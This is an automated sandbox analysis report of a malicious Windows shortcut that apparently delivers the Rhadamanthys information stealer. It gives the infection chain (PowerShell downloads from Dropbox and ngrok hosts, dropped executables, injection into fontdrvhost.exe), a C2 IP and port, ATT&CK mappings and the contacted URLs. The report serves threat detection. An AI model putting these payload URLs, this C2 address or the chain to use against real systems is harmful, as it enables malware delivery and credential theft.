                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,27_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004CE5B0 GetSystemTime,GetTimeZoneInformation,27_2_004CE5B0
                      Source: C:\Users\user\AppData\Local\Temp\1718218388.exeCode function: 27_2_004CB0E0 GetVersionExA,27_2_004CB0E0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001D.00000002.2843630378.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000003.2716353385.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2721019317.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2726552548.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000001D.00000002.2843630378.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000003.2716353385.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2721019317.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2726552548.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		1
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		21
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		211
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		3
                      Obfuscated Files or Information                      		Security Account Manager145
                      System Information Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts3
                      PowerShell                      		Login HookLogin Hook1
                      DLL Side-Loading                      		NTDS331
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Masquerading                      		LSA Secrets11
                      Process Discovery                      		SSHKeylogging114
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials41
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                      Process Injection                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572662 Sample: taCCGTk8n1.lnk Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 83 ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com 2->83 85 uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com 2->85 87 8 other IPs or domains 2->87 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Windows shortcut file (LNK) starts blacklisted processes 2->115 117 9 other signatures 2->117 14 cmd.exe 1 2->14         started        17 msedge.exe 65 411 2->17         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 131 Windows shortcut file (LNK) starts blacklisted processes 14->131 133 Suspicious powershell command line found 14->133 135 PowerShell case anomaly found 14->135 22 powershell.exe 14 28 14->22         started        27 conhost.exe 1 14->27         started        75 192.168.2.6, 2845, 443, 49701 unknown unknown 17->75 77 192.168.2.4 unknown unknown 17->77 81 2 other IPs or domains 17->81 137 Maps a DLL or memory area into another process 17->137 29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 5 other processes 17->35 79 127.0.0.1 unknown unknown 20->79 signatures6 process7 dnsIp8 89 www-env.dropbox-dns.com 162.125.65.18, 443, 49709, 49731 DROPBOXUS United States 22->89 91 edge-block-www-env.dropbox-dns.com 162.125.69.15, 443, 49710, 49742 DROPBOXUS United States 22->91 93 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app 3.125.209.94, 443, 49707 AMAZON-02US United States 22->93 71 C:\Users\user\AppData\Local\...\697963187.bat, DOS 22->71 dropped 123 Windows shortcut file (LNK) starts blacklisted processes 22->123 125 Loading BitLocker PowerShell Module 22->125 127 Powershell drops PE file 22->127 37 cmd.exe 22->37         started        40 msedge.exe 10 22->40         started        95 ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com 29->95 97 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 49773, 49785 GOOGLEUS United States 29->97 99 8 other IPs or domains 29->99 file9 signatures10 process11 signatures12 119 Windows shortcut file (LNK) starts blacklisted processes 37->119 121 Suspicious powershell command line found 37->121 42 powershell.exe 37->42         started        45 conhost.exe 37->45         started        47 msedge.exe 40->47         started        process13 file14 73 C:\Users\user\AppData\...\1718218388.exe, PE32 42->73 dropped 49 1718218388.exe 42->49         started        53 msedge.exe 42->53         started        process15 file16 69 C:\Users\user\Videos\...\DiskTuner.exe, PE32 49->69 dropped 103 Multi AV Scanner detection for dropped file 49->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->105 107 Drops large PE files 49->107 109 2 other signatures 49->109 55 1718218388.exe 49->55         started        57 msedge.exe 53->57         started        signatures17 process18 process19 59 fontdrvhost.exe 55->59         started        63 WerFault.exe 55->63         started        dnsIp20 101 104.161.43.18, 2845, 49908 IOFLOODUS United States 59->101 129 Switches to a custom stack to bypass stack traces 59->129 65 fontdrvhost.exe 59->65         started        signatures21 process22 process23 67 WerFault.exe 65->67         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      taCCGTk8n1.lnk21%ReversingLabsWin32.Trojan.Pantera
                      taCCGTk8n1.lnk100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\1718218388.exe55%ReversingLabsWin32.Infostealer.Tinba

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://permanently-removed.invalid/LogoutYxAB0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/OAuthLoginI0%Avira URL Cloudsafe
                      http://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/MergeSessionI0%Avira URL Cloudsafe
                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a-UseBa0%Avira URL Cloudsafe
                      https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com/cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=10%Avira URL Cloudsafe
                      https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com/cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJS0%Avira URL Cloudsafe
                      https://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                      https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      fg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalse
                        		high
                        s-part-0012.t-0009.t-msedge.net
                        		13.107.246.40
                        		truefalse
                          		high
                          7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                          		3.125.209.94
                          		truefalse
                            		high
                            chrome.cloudflare-dns.com
                            		172.64.41.3
                            		truefalse
                              		high
                              edge-block-www-env.dropbox-dns.com
                              		162.125.69.15
                              		truefalse
                                		high
                                www-env.dropbox-dns.com
                                		162.125.65.18
                                		truefalse
                                  		high
                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                  		94.245.104.56
                                  		truefalse
                                    		high
                                    googlehosted.l.googleusercontent.com
                                    		142.250.181.65
                                    		truefalse
                                      		high
                                      clients2.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        bzib.nelreports.net
                                        		unknown
                                        		unknownfalse
                                          		high
                                          ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.dropbox.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.com/cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=1false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/4633msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://anglebug.com/7382msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://issuetracker.google.com/284462263msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.compowershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://anglebug.com/7714msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.dropbox.com/scl/fi/qpowershell.exe, 00000010.00000002.2537284093.00000293D2575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://anglebug.com/6248msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://permanently-removed.invalid/MergeSessionImsedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anglebug.com/6929msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://officeapps-df.live.compowershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://api.login.yahoo.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anglebug.com/5281msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2407724341.000001DD449D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D20E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://login.yahoo.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dropbox.com/playlist/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://issuetracker.google.com/255411748msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://onedrive.live.com/pickerpowershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
